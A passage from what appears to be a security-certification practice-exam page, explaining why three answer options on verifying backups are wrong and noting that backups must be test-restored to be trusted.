Option B is wrong because merely increasing the backup retention period does not verify the usability or integrity of the backups; it only stores more data without any validation. Option C is wrong because copying the backup set to a new storage bucket and assuming it is usable ignores the need to test the restore process and verify data integrity; backups are useless if they cannot be restored correctly. Option D is wrong because running a vulnerability scan against the backup server checks for security weaknesses but does not test whether the backup data can be restored and support business operations.

← PreviousPage 2 of 4 · 291 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Security Operations questions.